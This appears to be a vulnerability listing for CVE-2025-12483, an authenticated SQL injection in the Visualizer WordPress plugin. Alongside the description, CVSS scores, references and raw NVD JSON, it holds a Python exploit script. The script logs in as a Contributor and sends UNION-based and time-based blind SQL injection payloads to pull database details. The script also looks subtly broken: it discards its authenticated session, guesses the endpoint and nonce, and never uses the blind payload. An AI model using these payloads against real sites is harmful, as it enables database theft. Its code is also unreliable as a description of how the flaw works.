Security Vulnerability Report
CVE-2025-12483 CVSS 6.5 MEDIUM


Published: 2025-12-02 07:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'query' parameter in all versions up to, and including, 3.11.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Version 3.11.13 raises the minimum user-level for exploitation to administrator. 3.11.14 fully patches the vulnerability.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Visualizer: Tables and Charts Manager for WordPress < 3.11.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys
from urllib.parse import urlencode

# Target WordPress site with Visualizer plugin
TARGET_URL = "http://target-wordpress-site.com"

# Authentication credentials (Contributor+ role required)
USERNAME = "attacker_username"
PASSWORD = "attacker_password"


def get_auth_cookie():
    """Authenticate and get WordPress session cookie"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    response = session.post(login_url, data=login_data, allow_redirects=False)
    if 'wordpress_logged_in' in str(session.cookies):
        return session.cookies
    return None


def exploit_sql_injection(session):
    """Exploit SQL injection via query parameter"""
    # Vulnerable endpoint - Visualizer Gutenberg block
    exploit_url = f"{TARGET_URL}/wp-json/wp/v2/visualizer"

    # SQL injection payload - extract database name
    # Using UNION-based injection technique
    injection_payload = "1' UNION SELECT NULL,database(),user(),version()-- -"

    exploit_data = {
        'query': injection_payload,
        'action': 'visualizer_get_data',
        'chart_id': '1'
    }

    # Alternative: Time-based blind injection
    blind_payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -"

    headers = {
        'Content-Type': 'application/json',
        'X-WP-Nonce': 'your-wp-nonce'  # May need to fetch valid nonce
    }

    try:
        response = session.post(
            exploit_url,
            json=exploit_data,
            headers=headers,
            timeout=30
        )
        print(f"Response Status: {response.status_code}")
        print(f"Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")


def main():
    print("[*] CVE-2025-12483 SQL Injection Exploit")
    print("[*] Target: Visualizer WordPress Plugin < 3.11.14")

    session = requests.Session()
    cookies = get_auth_cookie()

    if cookies:
        print("[+] Authentication successful")
        exploit_sql_injection(session)
    else:
        print("[-] Authentication failed")
        sys.exit(1)


if __name__ == "__main__":
    main()
```

References

https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Gutenberg/Block.php#L499
https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Source/Query.php#L173
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3405160%40visualizer%2Ftrunk&old=3355840%40visualizer%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/94392c66-6e50-48bb-93cb-9aa9d0229761?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12483",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-02T07:15:46.880",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to SQL Injection via the 'query' parameter in all versions up to, and including, 3.11.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Version 3.11.13 raises the minimum user-level for exploitation to administrator. 3.11.14 fully patches the vulnerability."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Gutenberg/Block.php#L499",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/visualizer/tags/3.11.12/classes/Visualizer/Source/Query.php#L173",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3405160%40visualizer%2Ftrunk&old=3355840%40visualizer%2Ftrunk&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/94392c66-6e50-48bb-93cb-9aa9d0229761?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```